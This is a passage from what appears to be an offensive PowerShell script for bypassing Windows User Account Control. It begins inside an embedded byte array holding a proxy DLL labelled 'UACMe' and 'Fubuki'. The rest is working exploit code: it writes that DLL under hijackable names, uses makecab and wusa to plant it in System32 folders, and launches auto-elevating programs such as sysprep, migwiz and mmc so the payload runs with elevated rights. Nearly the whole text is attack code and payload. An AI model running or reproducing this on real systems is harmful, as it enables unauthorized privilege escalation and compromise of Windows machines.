0 0 0 16 0 0 0 16 0 0 0 16 0 0 0 16 0 0 0 16 0 0 0 16 0 0 0 16 0 0 0 16 0 0 0 16 0 0 0 16 0 0 0 16 0 0 0 16 0 0 0 16 0 0 0 16 0 0 0 16 0 0 0 16 0 0 0 16 0 0 0 16 0 0 0 16 0 0 0 16 0 0 0 16 0 0 0 16 0 0 0 16 0 0 0 16 0 0 0 16 0 0 0 16 0 0 157 34 0 0 180 34 0 0 202 34 0 0 212 34 0 0 222 34 0 0 249 34 0 0 21 35 0 0 48 35 0 0 67 35 0 0 88 35 0 0 106 35 0 0 126 35 0 0 147 35 0 0 175 35 0 0 194 35 0 0 218 35 0 0 237 35 0 0 8 36 0 0 28 36 0 0 49 36 0 0 76 36 0 0 102 36 0 0 114 36 0 0 136 36 0 0 150 36 0 0 177 36 0 0 195 36 0 0 215 36 0 0 0 0 1 0 2 0 3 0 4 0 5 0 6 0 7 0 8 0 9 0 10 0 11 0 12 0 13 0 14 0 15 0 16 0 17 0 18 0 19 0 20 0 21 0 22 0 23 0 24 0 25 0 26 0 27 0 70 117 98 117 107 105 51 50 46 100 108 108 0 67 97 108 108 78 116 80 111 119 101 114 73 110 102 111 114 109 97 116 105 111 110 0 67 111 110 115 116 114 117 99 116 80 97 114 116 105 97 108 77 115 103 86 87 0 67 114 101 97 116 101 85 114 105 0 67 117 114 114 101 110 116 73 80 0 68 101 118 79 98 106 67 114 101 97 116 101 68 101 118 105 99 101 73 110 102 111 76 105 115 116 0 68 101 118 79 98 106 68 101 115 116 114 111 121 68 101 118 105 99 101 73 110 102 111 76 105 115 116 0 68 101 118 79 98 106 69 110 117 109 68 101 118 105 99 101 73 110 116 101 114 102 97 99 101 115 0 68 101 118 79 98 106 71 101 116 67 108 97 115 115 68 101 118 115 0 68 101 118 79 98 106 79 112 101 110 68 101 118 105 99 101 73 110 102 111 0 68 108 108 82 101 103 105 115 116 101 114 83 101 114 118 101 114 0 71 101 110 101 114 97 116 101 65 99 116 105 111 110 81 117 101 117 101 0 80 111 119 101 114 71 101 116 65 99 116 105 118 101 83 99 104 101 109 101 0 80 114 105 118 97 116 101 67 111 73 110 116 101 114 110 101 116 67 111 109 98 105 110 101 85 114 105 0 80 114 111 99 101 115 115 65 99 116 105 111 110 81 117 101 117 101 0 83 76 71 101 116 87 105 110 100 111 119 115 73 110 102 111 114 109 97 116 105 111 110 0 87 100 115 65 98 111 114 116 66 108 97 99 107 98 111 97 114 100 0 87 100 115 65 98 111 114 116 66 108 97 99 107 98 111 97 114 100 73 116 101 109 69 110 117 109 0 87 100 115 67 114 101 97 116 101 66 108 97 99 107 98 111 97 114 100 0 87 100 115 68 101 115 116 114 111 121 66 108 97 99 107 98 111 97 114 100 0 87 100 115 69 110 117 109 70 105 114 115 116 66 108 97 99 107 98 111 97 114 100 73 116 101 109 0 87 100 115 69 110 117 109 78 101 120 116 66 108 97 99 107 98 111 97 114 100 73 116 101 109 0 87 100 115 70 114 101 101 68 97 116 97 0 87 100 115 71 101 116 66 108 97 99 107 98 111 97 114 100 86 97 108 117 101 0 87 100 115 73 110 105 116 105 97 108 105 122 101 0 87 100 115 73 115 68 105 97 103 110 111 115 116 105 99 77 111 100 101 69 110 97 98 108 101 100 0 87 100 115 83 101 116 65 115 115 101 114 116 70 108 97 103 115 0 87 100 115 83 101 116 117 112 76 111 103 77 101 115 115 97 103 101 87 0 87 100 115 84 101 114 109 105 110 97 116 101 0 71 67 84 76 0 16 0 0 137 2 0 0 46 116 101 120 116 36 109 110 0 0 0 0 0 32 0 0 60 0 0 0 46 105 100 97 116 97 36 53 0 0 0 0 64 32 0 0 8 1 0 0 46 114 100 97 116 97 0 0 80 33 0 0 148 3 0 0 46 101 100 97 116 97 0 0 228 36 0 0 220 0 0 0 46 114 100 97 116 97 36 122 122 122 100 98 103 0 0 0 192 37 0 0 40 0 0 0 46 105 100 97 116 97 36 50 0 0 0 0 232 37 0 0 20 0 0 0 46 105 100 97 116 97 36 51 0 0 0 0 252 37 0 0 60 0 0 0 46 105 100 97 116 97 36 52 0 0 0 0 56 38 0 0 250 0 0 0 46 105 100 97 116 97 36 54 0 0 0 0 0 48 0 0 160 0 0 0 46 114 115 114 99 36 48 49 0 0 0 0 160 48 0 0 64 4 0 0 46 114 115 114 99 36 48 50 0 0 0 0 16 38 0 0 0 0 0 0 0 0 0 0 212 38 0 0 20 32 0 0 252 37 0 0 0 0 0 0 0 0 0 0 36 39 0 0 0 32 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 6 39 0 0 246 38 0 0 226 38 0 0 22 39 0 0 0 0 0 0 150 38 0 0 162 38 0 0 136 38 0 0 194 38 0 0 114 38 0 0 86 38 0 0 74 38 0 0 176 38 0 0 56 38 0 0 0 0 0 0 190 2 71 101 116 83 116 97 114 116 117 112 73 110 102 111 87 0 51 3 72 101 97 112 70 114 101 101 0 0 85 1 69 120 112 97 110 100 69 110 118 105 114 111 110 109 101 110 116 83 116 114 105 110 103 115 87 0 250 3 79 117 116 112 117 116 68 101 98 117 103 83 116 114 105 110 103 87 0 0 127 0 67 108 111 115 101 72 97 110 100 108 101 0 47 3 72 101 97 112 65 108 108 111 99 0 81 1 69 120 105 116 80 114 111 99 101 115 115 0 162 2 71 101 116 80 114 111 99 101 115 115 72 101 97 112 0 0 219 0 67 114 101 97 116 101 80 114 111 99 101 115 115 87 0 0 75 69 82 78 69 76 51 50 46 100 108 108 0 0 146 2 82 101 103 81 117 101 114 121 86 97 108 117 101 69 120 87 0 0 133 2 82 101 103 79 112 101 110 75 101 121 69 120 87 0 104 2 82 101 103 68 101 108 101 116 101 75 101 121 87 0 84 2 82 101 103 67 108 111 115 101 75 101 121 0 65 68 86 65 80 73 51 50 46 100 108 108 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 2 0 16 0 0 0 32 0 0 128 24 0 0 0 56 0 0 128 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 0 1 0 0 0 80 0 0 128 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 0 2 0 0 0 104 0 0 128 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 0 9 4 0 0 128 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 0 9 4 0 0 144 0 0 0 160 48 0 0 192 2 0 0 0 0 0 0 0 0 0 0 96 51 0 0 125 1 0 0 0 0 0 0 0 0 0 0 192 2 52 0 0 0 86 0 83 0 95 0 86 0 69 0 82 0 83 0 73 0 79 0 78 0 95 0 73 0 78 0 70 0 79 0 0 0 0 0 189 4 239 254 0 0 1 0 9 0 1 0 0 0 0 0 9 0 1 0 0 0 0 0 63 0 0 0 0 0 0 0 0 0 4 0 2 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 32 2 0 0 1 0 83 0 116 0 114 0 105 0 110 0 103 0 70 0 105 0 108 0 101 0 73 0 110 0 102 0 111 0 0 0 252 1 0 0 1 0 48 0 52 0 48 0 57 0 48 0 52 0 98 0 48 0 0 0 50 0 9 0 1 0 67 0 111 0 109 0 112 0 97 0 110 0 121 0 78 0 97 0 109 0 101 0 0 0 0 0 85 0 71 0 32 0 78 0 111 0 114 0 116 0 104 0 0 0 0 0 72 0 16 0 1 0 70 0 105 0 108 0 101 0 68 0 101 0 115 0 99 0 114 0 105 0 112 0 116 0 105 0 111 0 110 0 0 0 0 0 85 0 65 0 67 0 77 0 101 0 32 0 112 0 114 0 111 0 120 0 121 0 32 0 68 0 76 0 76 0 0 0 48 0 8 0 1 0 70 0 105 0 108 0 101 0 86 0 101 0 114 0 115 0 105 0 111 0 110 0 0 0 0 0 49 0 46 0 57 0 46 0 48 0 46 0 48 0 0 0 46 0 7 0 1 0 73 0 110 0 116 0 101 0 114 0 110 0 97 0 108 0 78 0 97 0 109 0 101 0 0 0 70 0 117 0 98 0 117 0 107 0 105 0 0 0 0 0 104 0 34 0 1 0 76 0 101 0 103 0 97 0 108 0 67 0 111 0 112 0 121 0 114 0 105 0 103 0 104 0 116 0 0 0 67 0 111 0 112 0 121 0 114 0 105 0 103 0 104 0 116 0 32 0 40 0 67 0 41 0 32 0 50 0 48 0 49 0 52 0 32 0 45 0 50 0 48 0 49 0 53 0 32 0 85 0 71 0 32 0 78 0 111 0 114 0 116 0 104 0 0 0 62 0 11 0 1 0 79 0 114 0 105 0 103 0 105 0 110 0 97 0 108 0 70 0 105 0 108 0 101 0 110 0 97 0 109 0 101 0 0 0 70 0 117 0 98 0 117 0 107 0 105 0 46 0 100 0 108 0 108 0 0 0 0 0 44 0 6 0 1 0 80 0 114 0 111 0 100 0 117 0 99 0 116 0 78 0 97 0 109 0 101 0 0 0 0 0 85 0 65 0 67 0 77 0 101 0 0 0 52 0 8 0 1 0 80 0 114 0 111 0 100 0 117 0 99 0 116 0 86 0 101 0 114 0 115 0 105 0 111 0 110 0 0 0 49 0 46 0 57 0 46 0 48 0 46 0 48 0 0 0 68 0 0 0 1 0 86 0 97 0 114 0 70 0 105 0 108 0 101 0 73 0 110 0 102 0 111 0 0 0 0 0 36 0 4 0 0 0 84 0 114 0 97 0 110 0 115 0 108 0 97 0 116 0 105 0 111 0 110 0 0 0 0 0 9 4 176 4 60 63 120 109 108 32 118 101 114 115 105 111 110 61 39 49 46 48 39 32 101 110 99 111 100 105 110 103 61 39 85 84 70 45 56 39 32 115 116 97 110 100 97 108 111 110 101 61 39 121 101 115 39 63 62 13 10 60 97 115 115 101 109 98 108 121 32 120 109 108 110 115 61 39 117 114 110 58 115 99 104 101 109 97 115 45 109 105 99 114 111 115 111 102 116 45 99 111 109 58 97 115 109 46 118 49 39 32 109 97 110 105 102 101 115 116 86 101 114 115 105 111 110 61 39 49 46 48 39 62 13 10 32 32 60 116 114 117 115 116 73 110 102 111 32 120 109 108 110 115 61 34 117 114 110 58 115 99 104 101 109 97 115 45 109 105 99 114 111 115 111 102 116 45 99 111 109 58 97 115 109 46 118 51 34 62 13 10 32 32 32 32 60 115 101 99 117 114 105 116 121 62 13 10 32 32 32 32 32 32 60 114 101 113 117 101 115 116 101 100 80 114 105 118 105 108 101 103 101 115 62 13 10 32 32 32 32 32 32 32 32 60 114 101 113 117 101 115 116 101 100 69 120 101 99 117 116 105 111 110 76 101 118 101 108 32 108 101 118 101 108 61 39 97 115 73 110 118 111 107 101 114 39 32 117 105 65 99 99 101 115 115 61 39 102 97 108 115 101 39 32 47 62 13 10 32 32 32 32 32 32 60 47 114 101 113 117 101 115 116 101 100 80 114 105 118 105 108 101 103 101 115 62 13 10 32 32 32 32 60 47 115 101 99 117 114 105 116 121 62 13 10 32 32 60 47 116 114 117 115 116 73 110 102 111 62 13 10 60 47 97 115 115 101 109 98 108 121 62 13 10 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 16 0 0 60 0 0 0 22 48 41 48 65 48 77 48 103 48 110 48 132 48 147 48 152 48 202 48 226 48 241 48 1 49 8 49 17 49 22 49 33 49 70 49 76 49 134 49 171 49 177 49 39 50 98 50 111 50 125 50 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0"
6778
6779
6780
6781 )
6782
6783 if ($CustomDll64)
6784 {
6785 Write-Verbose "Reading 64 bit DLL."
6786 [byte[]]$bytes = [System.IO.File]::ReadAllBytes($CustomDll64)
6787 $DllBytes64 = $bytes -join ' '
6788 }
6789 elseif ($CustomDll32)
6790 {
6791 Write-Verbose "Reading 32 bit DLL."
6792 [byte[]]$bytes = [System.IO.File]::ReadAllBytes($CustomDll32)
6793 $DllBytes32 = $bytes -join ' '
6794 }
6795
6796 if (([IntPtr]::Size) -eq 8)
6797 {
6798 Write-Verbose "64 bit process detected."
6799 $DllBytes = $DllBytes64
6800 }
6801 elseif (([IntPtr]::Size) -eq 4)
6802 {
6803 Write-Verbose "32 bit process detected."
6804 $DllBytes = $DllBytes32
6805 }
6806
6807 Out-File -FilePath $PayloadPath -InputObject $Payload -Encoding ascii
6808 $OSVersion = (Get-WmiObject -Class win32_OperatingSystem).BuildNumber
6809 switch($method)
6810 {
6811
6812 "Sysprep"
6813 {
6814 Write-Output "Using Sysprep method"
6815 if ($OSVersion -match "76")
6816 {
6817 Write-Verbose "Windows 7 found!"
6818 $dllname = "CRYPTBASE.dll"
6819 $PathToDll = "$env:temp\$dllname"
6820 Write-Verbose "Writing to $PathToDll"
6821 [Byte[]] $temp = $DllBytes -split ' '
6822 [System.IO.File]::WriteAllBytes($PathToDll, $temp)
6823 }
6824
6825 if ($OSVersion -match "96")
6826 {
6827 Write-Verbose "Windows 8 found!"
6828 $dllname = "shcore.dll"
6829 $PathToDll = "$env:temp\$dllname"
6830 Write-Verbose "Writing to $PathToDll"
6831 [Byte[]] $temp = $DllBytes -split ' '
6832 [System.IO.File]::WriteAllBytes($PathToDll, $temp)
6833 }
6834
6835 if ($OSVersion -match "10")
6836 {
6837 Write-Warning "Windows 10 found. Wusa.exe on Windows 10 has no extract option. Not supported *yet*. "
6838 }
6839 $Target = "$env:temp\uac.cab"
6840 $wusapath = "C:\Windows\System32\Sysprep\"
6841 $execpath = "C:\Windows\System32\Sysprep\sysprep.exe"
6842 Write-Verbose "Creating cab $Target"
6843 $null = & makecab $PathToDll $Target
6844 Write-Verbose "Extracting cab to $wusapath "
6845 $null = & wusa $Target /extract:$wusapath
6846 Start-Sleep -Seconds 1
6847 Write-Verbose "Executing $execpath "
6848 & $execpath
6849 }
6850
6851 "OOBE"
6852 {
6853 Write-Output "Using OOBE method"
6854 Write-Verbose "Writing DLLs to Temp directory"
6855 if ($OSVersion -match "76")
6856 {
6857 Write-Verbose "Windows 7 found!"
6858 $dllname = "wdscore.dll"
6859 $PathToDll = "$env:temp\$dllname"
6860 Write-Verbose "Writing to $PathToDll"
6861 [Byte[]] $temp = $DllBytes -split ' '
6862 [System.IO.File]::WriteAllBytes($PathToDll, $temp)
6863 }
6864
6865 if ($OSVersion -match "96")
6866 {
6867 Write-Verbose "Windows 8 found!"
6868 $dllname = "wdscore.dll"
6869 $PathToDll = "$env:temp\$dllname"
6870 Write-Verbose "Writing to $PathToDll"
6871 [Byte[]] $temp = $DllBytes -split ' '
6872 [System.IO.File]::WriteAllBytes($PathToDll, $temp)
6873 }
6874
6875 if ($OSVersion -match "10")
6876 {
6877 Write-Warning "Windows 10 found. Wusa.exe on Windows 10 has no extract option. Not supported *yet*. "
6878 }
6879 $Target = "$env:temp\uac.cab"
6880 $wusapath = "C:\Windows\System32\oobe\"
6881 $execpath = "C:\Windows\System32\oobe\setupsqm.exe"
6882 Write-Verbose "Creating cab $Target"
6883 $null = & makecab $PathToDll $Target
6884 Write-Verbose "Extracting cab to $wusapath "
6885 $null = & wusa $Target /extract:$wusapath
6886 Start-Sleep -Seconds 1
6887 Write-Verbose "Executing $execpath "
6888 & $execpath
6889 }
6890
6891 "ActionQueue"
6892 {
6893 Write-Output "Using Sysprep Actionqueue method"
6894 if ($OSVersion -match "76")
6895 {
6896 Write-Verbose "Windows 7 found!"
6897 $dllname = "ActionQueue.dll"
6898 $PathToDll = "$env:temp\$dllname"
6899 Write-Verbose "Writing to $PathToDll"
6900 [Byte[]] $temp = $DllBytes -split ' '
6901 [System.IO.File]::WriteAllBytes($PathToDll, $temp)
6902 }
6903
6904 if ($OSVersion -match "96")
6905 {
6906 Write-Warning "This method doesn't work Windows 8.1 onwards."
6907 }
6908
6909 if ($OSVersion -match "10")
6910 {
6911 Write-Warning "Windows 10 found. Wusa.exe on Windows 10 has no extract option. Not supported *yet*. "
6912 }
6913 $Target = "$env:temp\uac.cab"
6914 $wusapath = "C:\Windows\System32\Sysprep\"
6915 $execpath = "C:\Windows\System32\Sysprep\sysprep.exe"
6916 Write-Verbose "Creating cab $Target"
6917 $null = & makecab $PathToDll $Target
6918 Write-Verbose "Extracting cab to $wusapath "
6919 $null = & wusa $Target /extract:$wusapath
6920 Start-Sleep -Seconds 1
6921 Write-Verbose "Executing $execpath "
6922 & $execpath
6923 }
6924
6925 "migwiz"
6926 {
6927 Write-Output "Using migwiz method"
6928 if ($OSVersion -match "76")
6929 {
6930 Write-Verbose "Windows 7 found!"
6931 $dllname = "wdscore.dll"
6932 $PathToDll = "$env:temp\$dllname"
6933 Write-Verbose "Writing to $PathToDll"
6934 [Byte[]] $temp = $DllBytes -split ' '
6935 [System.IO.File]::WriteAllBytes($PathToDll, $temp)
6936 }
6937
6938 if ($OSVersion -match "96")
6939 {
6940 Write-Verbose "Windows 8 found!"
6941 $dllname = "wdscore.dll"
6942 $PathToDll = "$env:temp\$dllname"
6943 Write-Verbose "Writing to $PathToDll"
6944 [Byte[]] $temp = $DllBytes -split ' '
6945 [System.IO.File]::WriteAllBytes($PathToDll, $temp)
6946 }
6947
6948 if ($OSVersion -match "10")
6949 {
6950 Write-Warning "Windows 10 found. Wusa.exe on Windows 10 has no extract option. Not supported *yet*. "
6951 }
6952 $Target = "$env:temp\uac.cab"
6953 $wusapath = "C:\Windows\System32\migwiz\"
6954 $execpath = "C:\Windows\System32\migwiz\migwiz.exe"
6955 Write-Verbose "Creating cab $Target"
6956 $null = & makecab $PathToDll $Target
6957 Write-Verbose "Extracting cab to $wusapath "
6958 $null = & wusa $Target /extract:$wusapath
6959 Start-Sleep -Seconds 1
6960 Write-Verbose "Executing $execpath "
6961 & $execpath
6962 }
6963
6964 "cliconfg"
6965 {
6966 Write-Output "Using cliconfg method"
6967 if ($OSVersion -match "76")
6968 {
6969 Write-Verbose "Windows 7 found!"
6970 $dllname = "ntwdblib.dll"
6971 $PathToDll = "$env:temp\$dllname"
6972 Write-Verbose "Writing to $PathToDll"
6973 [Byte[]] $temp = $DllBytes -split ' '
6974 [System.IO.File]::WriteAllBytes($PathToDll, $temp)
6975 }
6976
6977 if ($OSVersion -match "96")
6978 {
6979 Write-Verbose "Windows 8 found!"
6980 $dllname = "ntwdblib.dll"
6981 $PathToDll = "$env:temp\$dllname"
6982 Write-Verbose "Writing to $PathToDll"
6983 [Byte[]] $temp = $DllBytes -split ' '
6984 [System.IO.File]::WriteAllBytes($PathToDll, $temp)
6985 }
6986
6987 if ($OSVersion -match "10")
6988 {
6989 Write-Warning "Windows 10 found. Wusa.exe on Windows 10 has no extract option. Not supported *yet*. "
6990 }
6991 $Target = "$env:temp\uac.cab"
6992 $wusapath = "C:\Windows\System32\"
6993 $execpath = "C:\Windows\System32\cliconfg.exe"
6994 Write-Verbose "Creating cab $Target"
6995 $null = & makecab $PathToDll $Target
6996 Write-Verbose "Extracting cab to $wusapath "
6997 $null = & wusa $Target /extract:$wusapath
6998 Start-Sleep -Seconds 1
6999 Write-Verbose "Executing $execpath "
7000 & $execpath
7001 }
7002
7003 "winsat"
7004 {
7005 Write-Output "Using winsat method"
7006 if ($OSVersion -match "76")
7007 {
7008 Write-Verbose "Windows 7 found!"
7009 $dllname = "ntwdblib.dll"
7010 $PathToDll = "$env:temp\$dllname"
7011 Write-Verbose "Writing to $PathToDll"
7012 [Byte[]] $temp = $DllBytes -split ' '
7013 [System.IO.File]::WriteAllBytes($PathToDll, $temp)
7014 }
7015
7016 if ($OSVersion -match "96")
7017 {
7018 Write-Verbose "Windows 8 found!"
7019 $dllname = "devobj.dll"
7020 $PathToDll = "$env:temp\$dllname"
7021 Write-Verbose "Writing to $PathToDll"
7022 [Byte[]] $temp = $DllBytes -split ' '
7023 [System.IO.File]::WriteAllBytes($PathToDll, $temp)
7024 }
7025
7026 if ($OSVersion -match "10")
7027 {
7028 Write-Warning "Windows 10 found. Wusa.exe on Windows 10 has no extract option. Not supported *yet*. "
7029 }
7030 $Target = "$env:temp\uac.cab"
7031 $wusapath = "C:\Windows\System32\sysprep\"
7032 $execpath = "C:\Windows\System32\sysprep\winsat.exe"
7033 $Targetwinsat = "$env:temp\uac_winsat.cab"
7034 Write-Verbose "Copying C:\Windows\System32\winsat.exe to $env:temp"
7035 Copy-Item "C:\Windows\System32\winsat.exe" "$env:temp\winsat.exe"
7036 Write-Verbose "Creating cab $Targetwinsat"
7037 $null = & makecab "$env:temp\winsat.exe" $Targetwinsat
7038 Write-Verbose "Extracting cab to $wusapath "
7039 $null = & wusa $Targetwinsat /extract:$wusapath
7040 Write-Verbose "Creating cab $Target"
7041 $null = & makecab $PathToDll $Target
7042 Write-Verbose "Extracting cab to $wusapath "
7043 $null = & wusa $Target /extract:$wusapath
7044 Start-Sleep -Seconds 1
7045 Write-Verbose "Executing $execpath "
7046 & $execpath
7047 }
7048
7049 "mmc"
7050 {
7051 Write-Output "Using mmc method"
7052 if ($OSVersion -match "76")
7053 {
7054 Write-Verbose "Windows 7 found!"
7055 $dllname = "ntwdblib.dll"
7056 $PathToDll = "$env:temp\$dllname"
7057 Write-Verbose "Writing to $PathToDll"
7058 [Byte[]] $temp = $DllBytes -split ' '
7059 [System.IO.File]::WriteAllBytes($PathToDll, $temp)
7060 }
7061
7062 if ($OSVersion -match "96")
7063 {
7064 Write-Verbose "Windows 8 found!"
7065 $dllname = "elsext.dll"
7066 $PathToDll = "$env:temp\$dllname"
7067 Write-Verbose "Writing to $PathToDll"
7068 [Byte[]] $temp = $DllBytes -split ' '
7069 [System.IO.File]::WriteAllBytes($PathToDll, $temp)
7070 }
7071
7072 if ($OSVersion -match "10")
7073 {
7074 Write-Warning "Windows 10 found. Wusa.exe on Windows 10 has no extract option. Not supported *yet*. "
7075 }
7076 $Target = "$env:temp\uac.cab"
7077 $wusapath = "C:\Windows\System32\"
7078 $execpath = "C:\Windows\System32\mmc.exe eventvwr.msc"
7079 Write-Verbose "Creating cab $Target"
7080 $null = & makecab $PathToDll $Target
7081 Write-Verbose "Extracting cab to $wusapath "
7082 $null = & wusa $Target /extract:$wusapath
7083 Start-Sleep -Seconds 1
7084 Write-Verbose "Executing $execpath "
7085 & $execpath
7086 }
7087 }
7088
7089 #Clean up
7090 Write-Verbose "Removing $Target."
7091 Remove-Item -Path $Target
7092 Write-Verbose "Removing $PathToDll."
7093 Remove-Item -Path $PathToDll
7094 Write-Verbose "$wusapath$dllname must be removed manually."
7095 Write-Verbose "$PayloadPath must be removed manually."
7096
7097}